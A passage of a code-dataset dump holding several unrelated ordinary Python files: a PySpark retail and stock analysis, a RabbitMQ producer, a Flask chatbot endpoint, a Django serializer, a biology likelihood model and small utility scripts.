SparkSession, types\r\nfrom pyspark.sql.functions import to_date, avg\r\n\r\nIN_PATH = \"s3://mysparks/data/clean/statcan/\"\r\nOUT_PATH = \"s3://mysparks/OUTPUT-Folder/\"\r\n\r\n#IN_PATH = \"../data/clean/statcan/\"\r\n#OUT_PATH = \"../OUTPUT-Folder/\"\r\n\r\nSCHEMA_PATH = \"schema/statcan/\"\r\nretail_id = \"20100008\"\r\n\r\ns3_obj = boto3.client('s3')\r\ns3_retail_obj = s3_obj.get_object(Bucket='mysparks', Key=SCHEMA_PATH + retail_id + \".json\")\r\ns3_retail_data = s3_retail_obj['Body'].read().decode('utf-8')\r\nretail_schema = json.loads(s3_retail_data)\r\n\r\n# os.makedirs(OUT_PATH, exist_ok=True)\r\n#retail_schema = json.load(open(\"../schema/statcan/\" + retail_id + \".json\"))\r\n\r\nyahoo_schema = types.StructType([\r\n types.StructField('REF_DATE', types.StringType()),\r\n types.StructField('Open', types.DoubleType()),\r\n types.StructField('High', types.DoubleType()),\r\n types.StructField('Low', types.DoubleType()),\r\n types.StructField('Close', types.DoubleType()),\r\n types.StructField('Adj Close', types.DoubleType()),\r\n types.StructField('Volume', types.DoubleType()),\r\n])\r\n\r\n\r\ndef main():\r\n retail = spark.read.csv(IN_PATH + retail_id + '/*.csv',\r\n schema=types.StructType.fromJson(retail_schema)) # reading 'RetailTradeSales' csv Data\r\n yahoo = spark.read.csv('s3://mysparks/data/YahooFinance.csv',\r\n schema=yahoo_schema) # reading seasonal stock prices from 'YahooFinance' csv Data\r\n\r\n # region Retail Trade Operations\r\n notnull = retail.filter(retail['REF_DATE'].isNotNull() | retail['GEO'].isNotNull() | retail['VALUE'].isNotNull()) \\\r\n .withColumn('REF_DATE', to_date(retail['REF_DATE'], 'yyyy-MM'))\r\n\r\n # filter out only \"Seasonally adjusted\" items, according to seasonal trading\r\n seasonal = notnull.filter(notnull['Adjustments'] == 'Seasonally adjusted')\r\n\r\n # fetch retail data for the last 10 years between Jan 2010 and Oct 2020\r\n duration = seasonal.where(seasonal['REF_DATE'].between(datetime.datetime.strptime('2010-01-01', '%Y-%m-%d'),\r\n datetime.datetime.strptime('2020-10-01', '%Y-%m-%d')))\r\n\r\n # Taking only the provinces for case-1, consider entire Canada for Case-2\r\n province_df = duration.filter(~duration['GEO'].contains(',')).filter(duration['GEO'] != 'Canada')\r\n canada_df = duration.filter(duration['GEO'] == 'Canada')\r\n\r\n # Case1 --- To find avg seasonal(monthly) Retail Trade values for every Province in Canada\r\n # Case2 --- To find avg seasonal(monthly) Retail Trade values per industry for entire Canada\r\n retail1 = province_df.groupby('REF_DATE').pivot('GEO').agg(avg('VALUE')).orderBy('REF_DATE')\r\n retail2 = canada_df.groupby('REF_DATE').pivot('North American Industry Classification System (NAICS)').agg(\r\n avg('VALUE')).orderBy('REF_DATE')\r\n # In Case2, we can drop the 3 columns with null fields (dont contribute to Trade) ->\r\n # Cannabis stores, Department stores, Other general merchandise stores\r\n retail2 = retail2.drop('Cannabis stores [453993]', 'Department stores [4521]',\r\n 'Other general merchandise stores [4529]')\r\n\r\n # Retail_df output\r\n retail1.coalesce(1).write.csv(OUT_PATH + 'Retail1_output', header=True,\r\n mode='overwrite') # Province-wise Retail Trade values\r\n\r\n s3_obj.put_object(Body=retail2.schema.json(), Bucket='mysparks', Key=SCHEMA_PATH + \"retailsales_canada.json\")\r\n retail2.coalesce(1).write.csv(OUT_PATH + 'Retail2_output', header=True,\r\n mode='overwrite') # Industry-wise Retail Trade values for all provinces\r\n # endregion\r\n\r\n # region Yahoo Operations\r\n # Seasonal (monthly) calculations\r\n checkNull = yahoo.filter(yahoo['REF_DATE'].isNotNull()).withColumn('REF_DATE',\r\n to_date(yahoo['REF_DATE'], 'yyyy-MM'))\r\n\r\n # fetch yahoo stock data for the last 10 years between Jan 2010 and Oct 2020\r\n duration1 = checkNull.where(checkNull['REF_DATE'].between(datetime.datetime.strptime('2010-01-01', '%Y-%m-%d'),\r\n datetime.datetime.strptime('2020-10-01', '%Y-%m-%d')))\r\n\r\n # finding the avg monthly \"highest\" and \"lowest\" stock prices, and the Avg number of stocks traded\r\n yahoo1 = duration1.groupby('REF_DATE').agg(avg('Volume'), avg('High').alias('Avg Highest Stock'),\r\n avg('Low').alias('Avg Lowest Stock')).orderBy('REF_DATE')\r\n yahoo1 = yahoo1.withColumnRenamed('avg(Volume)', 'Avg Stock Traded')\r\n\r\n # Yahoo_df output\r\n yahoo1.coalesce(1).write.csv(OUT_PATH + 'Yahoo_output', header=True,\r\n mode='overwrite') # Yahoo_output -> REF_DATE, Avg Volume, Avg Highest Stock, Avg Lowest Stock\r\n # endregion\r\n\r\n # region Merging Retail Trades Sales with corresponding Stocks traded (Yahoo finance)\r\n TotalIndustryTrade = retail2.withColumn(\r\n 'TotalRetailTradePrice', sum(col(x) for x in retail2.columns[1:])) # to find the total Retail Trade values for all industries for that 'REF_DATE'\r\n final_res = TotalIndustryTrade.join(yahoo1, TotalIndustryTrade.REF_DATE == yahoo1.REF_DATE, \"inner\").drop(\r\n yahoo1['REF_DATE'])\r\n final_res1 = final_res.select('REF_DATE', 'TotalRetailTradePrice', 'Avg Stock Traded', 'Avg Highest Stock',\r\n 'Avg Lowest Stock').orderBy('REF_DATE')\r\n final_res1.coalesce(1).write.csv(OUT_PATH + 'Retail+YahooStock', header=True,\r\n mode='overwrite') # Retail+YahooStock --> REF_DATE, TotalRetailTradePrice, AvgStockTraded, AvgHighestStock, AvgLowestStock\r\n # endregion\r\n\r\n\r\nif __name__ == '__main__':\r\n spark = SparkSession.builder.appName('Retail+Yahoo Analysis').getOrCreate()\r\n spark.sparkContext.setLogLevel('WARN')\r\n sc = spark.sparkContext\r\n main()\r\n","sub_path":"src/5.RetailTradeSales+Yahoo.py","file_name":"5.RetailTradeSales+Yahoo.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"582969472","text":"edad = 0\n\nwhile edad < 18:\n edad = edad + 1\n print('Felicidades, tienes ' + str(edad))\n\nsalir = False\n\nwhile not salir:\n opcion = input('Ingrese entrada \\n')\n if opcion == 'adios':\n salir = True\n else:\n print(opcion)","sub_path":"Programacion 1/Python/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"13299526","text":"import sys\nimport os\nimport re\n\ndef readAllAPIFiles(path):\n file_list = os.listdir(path)\n temp = \"\"\n for single_file in file_list:\n current_path = path + \"/\" + single_file\n if(os.path.isdir(current_path)):\n temp += readAllAPIFiles(current_path)\n else:\n # check this file is data structure file or not\n if(re.match(r\".*((api|apis)\\.md)$\", single_file) != None):\n f = open(current_path, 'r')\n data_list = f.read().split(\"# Data Structures\")\n if(len(data_list) >=2):\n temp = temp + data_list[1]\n f.close()\n return temp\n\ndef readAllDataFiles(path):\n files_list = os.listdir(path)\n temp = \"\"\n for single_file in files_list:\n current_path = path + \"/\" + single_file\n if(os.path.isdir(current_path)):\n temp += readAllDataFiles(current_path)\n else:\n # check this file is data structure file or not\n if(re.match(r\".*_data_structures\\.md$\", single_file) != None):\n f = open(current_path, 'r')\n data_list = f.readlines()\n for index in range(len(data_list)):\n if(index < len(data_list)-2):\n match_object_line = re.match(r\"^##.*\\(object\\)\\n$\", data_list[index])\n match_object_form = re.search(r\"^\\s*(-|\\+).*\", data_list[index+2])\n if(match_object_line != None and match_object_form == None):\n data_list.pop(index+2)\n if(index < len(data_list)):\n temp += data_list[index]\n temp = temp.replace(\"# Data Structures\", \"\")\n f.close()\n return temp\n\ndata_dir_path = sys.argv[1]\nall_in_one_file = \"# Data Structures\" + readAllDataFiles(data_dir_path)\napi_dir_path = sys.argv[2]\nall_in_one_file = all_in_one_file + readAllAPIFiles(api_dir_path)\n\nf = open(\"temp.apib\", \"w\")\nf.write(all_in_one_file)\nf.close()\n","sub_path":"splitDataStructure.py","file_name":"splitDataStructure.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612433007","text":"cmds = {\n 'look': 'Look Around',\n 'north': 'Go North',\n 'south': 'Go South',\n 'east': 'Go East',\n 'west': 'Go West',\n }\n\nexit_abbrevs = {\n 'n': 'north',\n 's': 'south',\n 'e': 'east',\n 'w': 'west',\n }\n\n\nrooms = {\n 'town_square_1': {\n 'title': 'Town Square',\n 'description': \"\"\"\nYou are standing in the center of the town.\n\"\"\",\n 'exits': {\n 'east': 'dirt_road_1',\n 'west': 'town_narrow_1'\n }\n },\n 'dirt_road_1': {\n 'title': 'A Dirt Road',\n 'description': \"\"\"\nYou are standing on a dirt road off of town square.\"\"\",\n 'exits': {\n 'west': 'town_square_1'\n }\n },\n 'town_narrow_1': {\n 'title': 'A Narrow Alley',\n 'description': \"\"\"\nYou are in a narrow alley. It is very dark.\"\"\",\n 'exits': {\n 'east': 'town_square_1'\n }\n },\n }\n\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"16273611","text":"\n# Third Party\nfrom rest_framework import serializers\n\n# LingoApp\nfrom texts.models import *\n\n\n# NEED language\n\nclass ResourceSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = ResourceType\n\t\tfields = ('name', 'url')\n\nclass TextSerializer(serializers.ModelSerializer):\n\tresource = ResourceSerializer()\n\n\tclass Meta:\n\t\tmodel = Text\n\t\tfields = ('name', 'complexity_rank', 'resource',) \n\nclass PatternSerializer(serializers.ModelSerializer):\n\t__after_signs = (';', ':', '.', ',', '?', '!', '-',')')\n\t__before_signs = ('(', '\"')\n\n\tfull_text = TextSerializer()\n\n\tclass Meta: \n\t\tmodel = Pattern\n\t\tfields = ('full_text', 'pk')\n\n\tdef to_representation(self, instance):\n\t\tdata = super().to_representation(instance)\n\t\tdata['content'] = []\n\t\ttext = instance.getText()\n\t\tfor rawWord in text.split():\n\t\t\tbSignFlag = False\n\t\t\taSignFlag = False\n\t\t\tif rawWord[0] in self.__before_signs:\n\t\t\t\tbSignFlag = True\n\t\t\tif rawWord[-1] in self.__after_signs:\n\t\t\t\taSignFlag = True\n\t\t\t\t\n\t\t\tif bSignFlag and not aSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[1], 'is_sign' : True})\n\t\t\t\tdata['content'].append({'word' : rawWord[1:], 'is_sign' : False})\n\n\t\t\tif aSignFlag and not bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[:-1], 'is_sign' : False})\n\t\t\t\tdata['content'].append({'word' : rawWord[-1], 'is_sign' : True})\n\t\t\t\t\n\t\t\tif aSignFlag and bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord[1], 'is_sign' : True})\n\t\t\t\tdata['content'].append({'word' : rawWord[1:-1], 'is_sign' : False})\n\t\t\t\tdata['content'].append({'word' : rawWord[-1], 'is_sign' : True})\n\n\t\t\tif not aSignFlag and not bSignFlag:\n\t\t\t\tdata['content'].append({'word' : rawWord, 'is_sign' : False})\n\n\t\treturn data\n\nclass RawPatternSerializer(PatternSerializer):\n\tdef to_representation(self, instance):\n\t\tdata = super().to_representation(instance)\n\t\tdata['content'] = instance.getText();\n\t\treturn data;\n\nclass RandomPatternSerializer(PatternSerializer):\n\tdef to_representation(self, instance):\n\t\tpatternData = super().to_representation(instance)\n\t\tdata = {}\n\t\tdata['pk'] = patternData['pk']\n\t\treturn data","sub_path":"texts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291714570","text":"import pandas as pd\nimport config\n\nclass CovertData(object):\n '''指定数据的路径,返回特征字典,二维字典\n param: 数据路径\n return: 二级字典\n '''\n def __init__(self, path):\n self.path = path\n self.dataset = self.read_data()\n self.features = self.map_features()\n self.numeric_cols, self.cat_cols = self.classify_features()\n\n\n def convert_unknown(self):\n data = self.dataset\n for i in range(data.shape[1]):\n data.iloc[:,i].fillna(config.nan, inplace=True)\n try:\n data.iloc[:,i] = data.iloc[:, i].astype(int)\n except:\n #print('异常%d'%i, end=' ')\n a = data.iloc[:,i].unique()\n mapping = dict(zip(a, range(1,len(a)+1)))\n data.iloc[:,i] = data.iloc[:,i].map(mapping)\n\n for unknown in config.unknown:\n if unknown in a:\n data.iloc[:,i] = data.iloc[:,i].astype(str)\n data.iloc[:,i] = data.iloc[:,i].replace(str(mapping['-9999']), np.nan)\n\n data.iloc[:,i] = data.iloc[:,i].astype(str)\n continue\n\n data.iloc[:,i] = data.iloc[:,i].astype(str)\n data.iloc[:,i] = data.iloc[:,i].replace('-9999', np.nan)\n return data\n\n def classify_features(self):\n data = self.dataset\n ignore_cols = []\n\n for i in range(data.shape[1]):\n for j in config.base_ignore_cols:\n if j in data.columns[i]:\n ignore_cols.append(data.columns[i])\n ignore_cols.extend(config.base_ignore_cols)\n\n single_value_cols = []\n for i in range(data.shape[1]):\n if data.iloc[:,i].nunique() in [0,1]:\n single_value_cols.append(data.columns[i])\n ignore_cols.extend(single_value_cols)\n\n partial_numeric_cols = []\n for i in range(data.shape[1]):\n for j in config.base_numeric_cols:\n if j in data.columns[i]:\n partial_numeric_cols.append(data.columns[i])\n partial_numeric_cols.extend(config.base_numeric_cols)\n\n cat_cols = []\n for i in range(data.shape[1]):\n if data.columns[i] in ignore_cols:\n continue\n if data.columns[i] in partial_numeric_cols:\n continue\n if data.columns[i] in config.base_label_cols:\n continue\n if data.iloc[:, i].nunique() < config.cat_numeric_threshold:\n cat_cols.append(data.columns[i])\n\n numeric_cols = []\n for i in data.columns:\n if i in ignore_cols:\n continue\n if i in config.base_label_cols:\n continue\n if i in cat_cols:\n continue\n numeric_cols.append(i)\n\n return cat_cols, numeric_cols\n\n def read_data(self):\n data = pd.read_csv(self.path, low_memory=False)\n logging.info('data size: %s' % data.shape)\n return data\n\n def map_features(self):\n data = self.dataset\n\n features = dict()\n for i in range(data.shape[1]):\n data.iloc[:, i].fillna('-9999', inplace=True)\n try:\n data.iloc[:,i] = data.iloc[:, i].astype(int)\n except ValueError:\n # LOGGING\n t = data.iloc[:,i].unique()\n t_map = dict(zip(t, range(1, len(t)+1)))\n features[data.columns[i]] = t_map\n return features\n","sub_path":"webapi/code/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"24923879","text":"import numpy as np\nimport scipy as sp\nimport scipy.stats\n\nclass asym_lh:\n ''' class with the likelihood for the asymetric cell labelling assays \n usable for minuit\n '''\n\n def __init__(self,data,times,ncell):\n ''' data = number of labeld cells\n times = time for labeling fraction\n ncell = number of cells \n '''\n self.data = np.round(data)\n self.datalen = np.size(data)\n self.times = times\n if np.size(ncell) != self.datalen:\n self.ncell = np.ones_like(data,dtype=np.int32)*ncell\n else:\n self.ncell = ncell\n\n def compute(self, Tc,r,GF,sigma_cell,sigma_sample):\n ''' compute log liklyhood for parameters given\n '''\n pmf = self.pmf_f(Tc,r,GF,sigma_cell,sigma_sample) \n pmf[np.abs(pmf) < 1e-300] = 1e-300 #fix nan in log\n return np.sum(-np.log( pmf) )\n #return np.sum(-np.log( self.pmf_f(Tc,r,GF,sigma_cell,sigma_sample) ) )\n\n\n def log_params(self, mu, sigma):\n \"\"\" A transformation of paramteres such that mu and sigma are the\n mean and variance of the log-normal distribution and not of\n the underlying normal distribution.\n \"\"\"\n s2 = np.log(1.0 + sigma**2/mu**2)\n m = np.log(mu) - 0.5 * s2\n s = np.sqrt(s2)\n return m, s\n\n def pdf_LN(self, X, mu, sigma):\n ''' lognormal pdf with actual miu and sigma\n '''\n mu_tmp, sigma_tmp = self.log_params(mu, sigma)\n return sp.stats.lognorm.pdf(X, s=sigma_tmp, scale = np.exp(mu_tmp))\n\n def logn(self, sigma_cell,Tc,r,n):\n ''' def logn(t,sigma_cell,Tc,r):\n analytic solution for cell only noise\n '''\n mean,sigma = self.log_params(Tc,sigma_cell)\n la = np.log(self.times[n]/(1-r))\n idf = 0.5 * ( 1 + sp.special.erf( (mean - la) / (np.sqrt(2) * sigma) ) )\n int2 = 0.5 * np.exp( -mean + 0.5 * sigma * sigma ) * sp.special.erfc( ( -mean + sigma*sigma + la ) / (np.sqrt(2)*sigma) )\n return 1-1*idf+r*idf+self.times[n]*int2\n\n\n\n def pmf_f(self, Tc,r, GF, sigma_cell,sigma_sample):\n \"\"\" pmf for the number of labelled cells\n to test: using epsabs=0.1 and epsrel=0.1 in quad might significantly\n speed up the computation without loosing too much precision\n \"\"\"\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n\n #P =[sp.integrate.quadrature(self.f, 0.0001, Tc+(sigma_sample*10),args=([i]),tol=1.48e-08, rtol=1.48e-08)[0] for i in range(self.datalen)]\n #P = [sp.integrate.fixed_quad(self.f, 0.0001, Tc+(sigma_sample*10),n=100,args=([i]))[0] for i in range(self.datalen)]\n P = [sp.integrate.fixed_quad(self.f, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10),n=200,args=([i]))[0] for i in range(self.datalen)]\n return np.array(P)\n\n def f(self, TC_,n):\n return sp.stats.binom.pmf(self.data[n], self.ncell[n], self.GF*self.logn(self.sigma_cell,TC_,self.r,n) ) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n \n \nclass dist:\n ''' distribution for the asymetric labelling assay '''\n\n def __init__(self):\n pass\n\n def log_params(self, mu, sigma):\n \"\"\" A transformation of paramteres such that mu and sigma are the \n mean and variance of the log-normal distribution and not of\n the underlying normal distribution.\n \"\"\"\n s2 = np.log(1.0 + sigma**2/mu**2)\n m = np.log(mu) - 0.5 * s2\n s = np.sqrt(s2)\n return m, s\n\n def pdf_LN(self, X, mu, sigma):\n ''' lognormal pdf with actual miu and sigma\n '''\n mu_tmp, sigma_tmp = self.log_params(mu, sigma)\n return sp.stats.lognorm.pdf(X, s=sigma_tmp, scale = np.exp(mu_tmp))\n\n def logn(self, sigma_cell,Tc,r):\n ''' def logn(t,sigma_cell,Tc,r):\n analytic solution for cell only noise\n '''\n mean,sigma = self.log_params(Tc,sigma_cell)\n la = np.log(self.t/(1-r))\n idf = 0.5 * ( 1 + sp.special.erf( (mean - la) / (np.sqrt(2) * sigma) ) )\n int2 = 0.5 * np.exp( -mean + 0.5 * sigma * sigma ) * sp.special.erfc( ( -mean + sigma*sigma + la ) / (np.sqrt(2)*sigma) )\n return 1-1*idf+r*idf+self.t*int2\n\n\n\n def pmf_f(self,ncell,Tc,r, GF, sigma_cell,sigma_sample, t, x):\n \"\"\" pmf for the number of labelled cells\n \"\"\"\n self.ncell = ncell\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n self.t = t\n \n #P = sp.integrate.quadrature(self.f, 0.01, 11,args=([x]))[0] \n P = sp.integrate.fixed_quad(self.f, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10),n=200,args=([x]))[0]\n return P\n\n def f(self, TC_,x):\n return sp.stats.binom.pmf(x, self.ncell, self.GF*self.logn(self.sigma_cell,TC_,self.r) ) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n\n def pmf_mean(self,ncell,Tc,r, GF, sigma_cell,sigma_sample, t):\n \"\"\" mean number of labelled cells\n \"\"\"\n self.ncell = ncell\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n self.t = t\n \n #P = sp.integrate.quadrature(self.fm, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10))[0] \n P = sp.integrate.fixed_quad(self.fm, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10),n=200)[0]\n return ncell*P\n\n\n def fm(self, TC_):\n return self.GF*self.logn(self.sigma_cell,TC_,self.r) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n \n\n@np.vectorize\ndef cla_det_model(t, tc=0.2, f=0.3, GF=0.5, mode=1, **kwargs):\n \"\"\" Model for labeling assays in vivo.\n Based on Lefevre et al., 2013 and extended with an initial\n growth fraction.\n \n t ... time after start of labeling\n S ... absolute length of S-Phase\n G1 ... absolute length of G1-Phase\n G2M ... absolute length of G2-Phase and M-Phase\n rmode ... mean number of daughter cells after cell division remaining\n in the population\n GF ... initial growth fraction\n \n Lefevre, J., Marshall, D. J., Combes, A. N., Ju, A. L., Little, M. H.\n & Hamilton, N. A. (2013). Modelling cell turnover in a complex tissue\n during development. Journal of Theoretical Biology, 338, 66-79.\n \"\"\"\n r = mode\n TC = tc\n S = TC*f\n G2M = 0.5*(1-S)\n if G2M < 0:\n return sp.nan\n if S + G2M > TC:\n return sp.nan\n else:\n if r==1:\n if t < TC - S:\n return GF * (t + S) / TC\n else:\n return GF\n else:\n # calculate the growth fraction at time t\n g = ( ( GF * r ** (t / TC) ) / ( GF * r ** (t / TC) + (1 - GF) ) )\n if t < G2M:\n return g * ((r ** ( ( G2M + S ) / TC ) - r ** (( G2M - t ) / TC) ) / (r - 1.0) )\n elif t < TC - S:\n return g * (1.0 - ( r ** ( ( TC + G2M - t ) / TC ) - r ** ( ( G2M + S) / TC ) ) / (r - 1.0) )\n else:\n return g\n\n\n\n","sub_path":"backend/fit/clapy.py","file_name":"clapy.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"71290784","text":"\n\nfrom xai.brain.wordbase.nouns._axiom import _AXIOM\n\n#calss header\nclass _AXIOMS(_AXIOM, ):\n\tdef __init__(self,): \n\t\t_AXIOM.__init__(self)\n\t\tself.name = \"AXIOMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"axiom\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_axioms.py","file_name":"_axioms.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"23927268","text":"import pandas as pd\nimport const as ct\nimport csv_basic as cb\nimport os\n\nCSV_DIR = ct.CSV_DIR\nCSV_HEADER = ct.CSV_HEADER\nTRIAL_TIME_COLUMN = ct.TRIAL_TIME_COLUMN\nCOLUMN_NAME = ['file_name', 'trial_time']\nSAVE_DIR = ct.OUTPUT_DIR\nSAVE_FILENAME = ct.OUTPUT_FILENAME_TRIAL_TIME\n\n\n# cs読み込みに使用するクラス\nclass ReadCsv:\n def read_csv(self, path, names):\n return pd.read_csv(path, names=names)\n\n# pandasデータを読み込んで加工するために使用するクラス\nclass AbstructDataframe:\n def __init__(self, df, column):\n self.df = df[column]\n\nclass TrialDataframe(AbstructDataframe):\n def __init__(self, df, column=TRIAL_TIME_COLUMN):\n self.df = df[column]\n\n # trial_idを指定するとそれに対応したdfをindexを0から振り直して返す\n def extraction(self):\n df_ex = self.df.query('trial_time != 0').reset_index(drop=True)\n return df_ex\n\nif __name__ == \"__main__\":\n trial_time_data = cb.TrialTimeInfo(COLUMN_NAME)\n csv_filenames = os.listdir(CSV_DIR)\n for csv_filename in csv_filenames:\n csv_file = ReadCsv()\n trial_times = TrialDataframe(csv_file.read_csv(CSV_DIR + csv_filename, CSV_HEADER))\n trial_time_data.add_Dataframe(csv_filename, trial_times.extraction().mean()[\"trial_time\"])\n trial_time_data.write_Dataframe(SAVE_DIR + SAVE_FILENAME)","sub_path":"app/src/trial_time.py","file_name":"trial_time.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"338451989","text":"# 生产者代码\nimport pika\n# pip install pika\n\n# 用户和密码\ncredentials = pika.PlainCredentials('admin', 'admin')\n\n# 虚拟队列需要指定参数 virtual_host,如果是默认的可以不填。\nparameters = pika.ConnectionParameters(host='localhost',\n port=5672,\n virtual_host='/',\n credentials=credentials)\n\n# 阻塞方法\nconnection = pika.BlockingConnection(parameters)\n\n# 建立信道\nchannel = connection.channel()\n\n# 声明消息队列(队列不存在就创建,存在就直接使用)\n# 如不存在自动创建\n# durable = True 队列持久化\nchannel.queue_declare(queue='task_queue', durable=True)\n\n# exchange 指定交换机\n# routing_key 指定队列名\nmessage = 'send message to taskqueue'\nchannel.basic_publish(exchange='',\n routing_key='task_queue',\n body=message,\n properties=pika.BasicProperties(delivery_mode=2)) # delivery_mode=2 消息持久化\n\n# 关闭与rabbitmq server的链接\nconnection.close()\n","sub_path":"week05/rebbitmq/一个生产者多个消费者/mod5_rabbit_taskqueue_pub.py","file_name":"mod5_rabbit_taskqueue_pub.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"627271286","text":"\nimport numpy as np\nimport time\nimport json\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\n# Copyright 2015 Google Inc. All Rights Reserved.\nimport logging\n\nfrom flask import Flask,request,Response\n\n\napp = Flask(__name__)\n\ndef classify(sentence, show_details=False):\n results = think(sentence, show_details)\n results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD ] \n results.sort(key=lambda x: x[1], reverse=True) \n return_results =[[classes[r[0]],r[1]] for r in results]\n print (return_results)\n return return_results\ndef sigmoid(x):\n output = 1/(1+np.exp(-x))\n return output\n\n# convert output of sigmoid function to its derivative\ndef sigmoid_output_to_derivative(output):\n return output*(1-output)\n \ndef clean_up_sentence(sentence):\n # tokenize the pattern\n sentence_words = nltk.word_tokenize(sentence)\n # stem each word\n sentence_words = [stemmer.stem(word.lower()) for word in sentence_words]\n return sentence_words\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words, show_details=False):\n # tokenize the pattern\n sentence_words = clean_up_sentence(sentence)\n # bag of words\n bag = [0]*len(words) \n for s in sentence_words:\n for i,w in enumerate(words):\n if w == s: \n bag[i] = 1\n if show_details:\n print (\"found in bag: %s\" % w)\n\n return(np.array(bag))\n\ndef think(sentence, show_details=False):\n x = bow(sentence.lower(), words, show_details)\n if show_details:\n print (\"sentence:\", sentence, \"\\n bow:\", x)\n # input layer is our bag of words\n l0 = x\n # matrix multiplication of input and hidden layer\n l1 = sigmoid(np.dot(l0, synapse_0))\n # output layer\n l2 = sigmoid(np.dot(l1, synapse_1))\n return l2\n\n@app.route('/')\ndef hello():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n return 'Hello World!'\n\n\n@app.route('/api/v1/ChatbotAmadeus', methods=['POST'])\ndef Amadeus():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n data = request.get_json(silent=True)\n try:\n \tdeff = data[\"sentence\"]\n \tprediccion = classify(deff)\n \tif(len(prediccion)>=1):\n \t\tdata = {\n\t \t\t'intent' : prediccion[0][0],\n\t \t\t'score' : prediccion[0][1]\n \t\t}\n \t\tjs = json.dumps(data)\n \t\tresp = Response(js, status=200, mimetype='application/json')\n \t\treturn resp\n \telse:\n \t\tdata = {\n\t \t\t'intent' : None\n \t\t}\n \t\tjs = json.dumps(data)\n \t\tresp = Response(js, status=200, mimetype='application/json')\n \t\treturn resp\n except ValueError:\n \tdata = {\n \t\t'Message' : \"Request Incorrecto\"\n \t}\n \tjs = json.dumps(data)\n \tresp = Response(js, status=400, mimetype='application/json')\n \treturn resp\n\n\n@app.errorhandler(500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n \"\"\".format(e), 500\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n # [END app]\n stemmer = LancasterStemmer()\n global words \n global classes \n global synapse \n global synapse_0 \n global synapse_1 \n\n\n # probability threshold\n ERROR_THRESHOLD = 0.2\n # load our calculated synapse values\n synapse_file = 'synapses.json' \n with open(synapse_file) as data_file: \n synapse = json.load(data_file) \n synapse_0 = np.asarray(synapse['synapse0']) \n synapse_1 = np.asarray(synapse['synapse1'])\n words= np.asarray(synapse['words'])\n classes= np.asarray(synapse['classes']) \n app.run(host='127.0.0.1', port=8080, debug=True)\n\n# compute sigmoid nonlinearity\n\n\n","sub_path":"ANN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"229142989","text":"# -*- coding:utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport tensorflow as tf\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nimport sys\nimport shutil\nimport time\nfrom nju.fasttext.network import Settings\nfrom nju.fasttext.network import Fasttext\nfrom nju.fasttext.judger import Judger\nfrom nju.fasttext.data_helpers import train_batch_predict\nimport logging\nimport datetime\n\n# sys.path.append('../..')\nfrom nju.fasttext.data_helpers import to_categorical_accu\nfrom nju.fasttext.data_helpers import to_categorical_law\nfrom nju.fasttext.data_helpers import to_categorical_time\n\n\nstrtime = time.strftime(\"%Y-%m-%d-%H-%M\", time.localtime())\n# log_name = \"../logs/\"+strtime+\"_fasttext_old.txt\"\n# log_name = \"../logs/\"+strtime+\"law_fasttext_newaug.txt\"\nlog_name = \"../logs/\"+strtime+\"accu_fasttext_new1aug.txt\"\nlogging.basicConfig(handlers=[logging.FileHandler(log_name, 'w+', 'utf-8')], 